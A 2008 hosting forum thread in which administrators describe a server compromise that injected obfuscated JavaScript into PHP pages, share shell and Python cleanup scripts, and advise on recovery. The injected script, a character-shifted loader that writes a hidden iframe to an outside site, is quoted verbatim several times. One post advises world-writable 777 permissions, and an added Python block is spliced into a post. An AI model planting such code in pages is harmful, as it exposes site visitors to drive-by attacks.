The Community Forums


Website Hacked.

Discussion in 'Security' started by ManojB, Oct 19, 2008.

  1. ManojB
    Hello,

    I am getting the following error message on my website:

    I have investigated and found that all my PHP pages contain the following tags:

    It seems all my files have been corrupted, as I have manually removed these tags but still have the same problem. How can I overcome this problem? (suPHP has been disabled on my server.)
     
    #1 ManojB, Oct 19, 2008
    Last edited: Oct 19, 2008
  2. Bartuc
    Probably a virus on your computer causes this problem. You should run a virus scan on your own PC. This virus inserts this code on your web pages via FTP. The best solution is formatting and reinstalling Windows on your PC, changing your cPanel password and then manually cleaning these codes.
     
  3. oanielsen
    This is a cPanel hack of some type. It is in all the domains, and this code is also within the /cpapachebuild/buildapache/mhash/ directories too. It is ALL over the place. The whole server is infected with this.
     
  4. ManojB
    It seems it's a problem with the latest cPanel release, as my phpMyAdmin was also infected.
     
  5. oanielsen
    I spent almost 13 hours today figuring out a way to clean it up.

    Lots of shell and sed scripting!

    Very frustrating.
     
  6. ManojB
    Hello Oanielsen,

    Can you please let me know how you have removed this from your files?
     
  7. sparek-3
    What was the ownership and permissions of the files that were infected?

    If the files were owned by root and had permissions of 0644, then you could be looking at a root level compromise. If root has been compromised you need to do a full system restore.
     
  8. deieno
    Hi,
    I have the same problem: one server at LT was hacked (could it be because LT's database was hacked, again?).

    Does anyone know how to strip the malicious tags?

    I found this script: http://forums.cpanel.net/showpost.php?p=309725&postcount=241

    But what should the regex be to match this malicious code:

    <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
    for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
    document.write(result); </script>
    </html> </body>
     
  9. oanielsen
    All the servers we had compromised were at LT also. It was on servers we had never had a trouble ticket on, so it was not because of un-encrypted e-mail. This was definitely a direct database hack on the part of LT. Make sure you change all your passwords on servers at LT ASAP.

    Here is the fix we used.

    1. Download and install RPL http://www.laffeycomputer.com/rpl.html
    2. There are 2 script files we had to create.
    First Script we named fixhack.sh has the following code in it.
    Code:
    #!/bin/sh
    # Each rpl call deletes one exact line of the injected block (extension
    # filters: .php .html .htm .tpl; -q quiet). Run from the directory to clean.
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '<html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";' ''  *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq 'for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq 'document.write(result); </script>' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '</html> </body> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '<html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq 'document.write(result); </script>' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '</html> </body> </body>' '' *
    rpl -x'.php' -x'.html' -x'.htm' -x'.tpl' -tq '<html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";' '' *
    
    What that code is doing is running the RPL command for each of the lines you are wanting to find, and replacing the specified text with a NULL.

    The next shell script executes the previous script and recurses through all the directories. Each of these scripts we ran from the /home directory. Once you download RPL you will notice that it has a Recursive option, but it will bring your server to its knees, so it is better to use this script to do the recursion for you. We named the following piece of code recursehack.sh

    Code:
    #!/bin/sh
    # Visit every directory under /home and run fixhack.sh inside it.
    find /home -type d | while read -r DIRNAME
    do
        cd "$DIRNAME" || continue   # quote the path; skip directories we cannot enter
        /home/fixhack.sh
    done
    
    3. Make sure you CHMOD these scripts to 777
    4. Execute ./recursehack.sh from the /home directory
    5. We found that some of the things in the Cpanel directories were also infected. So, you need to run /scripts/upcp --force
    6. You will also find a new directory at the root of your server called something like "pons" or something like that. Do an ls -ltr at the root of your server and you will see a new directory there. Within this directory is a file called "framer.htm" which is the code that was injected into each page, and another script file that did all the dirty work.

    Hope this helps someone else. It definitely kicked our *sses for a few hours.
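    Added example, not part of oanielsen's post or anything else in this thread: a Python stand-in for the rpl/find scripts above that also answers deieno's regex question. It matches the injected block with a whitespace-tolerant pattern (rpl's exact-string match misses re-wrapped copies), decodes the charCodeAt(i)-1 obfuscation so you can see what the page actually loaded, and strips it; SAMPLE_INFECTED is constructed from the snippet quoted in the thread, and scan_tree only rewrites files when fix=True.

```python
import os
import re

# Constructed sample: a PHP file carrying the block quoted in the thread.
SAMPLE_INFECTED = (
    '<?php echo "hi"; ?>\n'
    '<html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy'
    '/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";\n'
    'for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);\n'
    'document.write(result); </script>\n'
    '</html> </body>\n'
)

# Whitespace between tokens is optional, so re-wrapped or minified copies
# (which defeat rpl's exact-string matching) are still caught.
INJECTION_RE = re.compile(
    r'<html>\s*<body>\s*<script>\s*var\s+source\s*=\s*"(?P<src>[^"]*)"\s*;'
    r'\s*var\s+result\s*=\s*"";\s*for\s*\(var\s+i\s*=\s*0;\s*i\s*<\s*source\.length;'
    r'\s*i\+\+\)\s*result\s*\+=\s*String\.fromCharCode\(source\.charCodeAt\(i\)\s*-\s*1\);'
    r'\s*document\.write\(result\);\s*</script>\s*</html>\s*</body>\s*',
    re.IGNORECASE,
)

def decode_payload(source):
    """Undo the obfuscation: every character was stored as chr(ord(c) + 1)."""
    return "".join(chr(ord(c) - 1) for c in source)

def find_injections(text):
    """Return the decoded payload of each injected block found in `text`."""
    return [decode_payload(m.group("src")) for m in INJECTION_RE.finditer(text)]

def clean(text):
    """Strip every injected block; return (cleaned text, blocks removed)."""
    return INJECTION_RE.subn("", text)

def scan_tree(root, exts=(".php", ".html", ".htm", ".tpl"), fix=False):
    """Walk `root` as recursehack.sh did with find; report infected files with
    the given extensions and rewrite them only when fix=True. {path: [payloads]}"""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for path in (os.path.join(dirpath, n) for n in files if n.lower().endswith(exts)):
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                data = fh.read()
            payloads = find_injections(data)
            if payloads:
                hits[path] = payloads
            if payloads and fix:
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(clean(data)[0])
    return hits
```

    Run scan_tree('/home') without fix=True first to get the list of files and decoded payloads; as sparek-3 and lngtanseco point out, if root itself was compromised the answer is a restore, not a regex.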
     
  10. deieno

    oanielsen,

    Thank you very much for sharing this script....
    I'll run this right now.

    Our problem was exactly the same: root had the "pons" folder with the same content.

    I'll move my servers from LT ASAP. This kind of trouble doesn't justify the raised prices :-(
     
  11. mtindor
    Who is LT?
     
  12. deieno
  13. BND
    How do I install this rpl? Please, urgently. My 300 sites were hacked.
     
  14. lngtanseco
    I suggest that you check first whether your server is rooted. If it is, you need an OS reload and to recover all your sites from backup.
     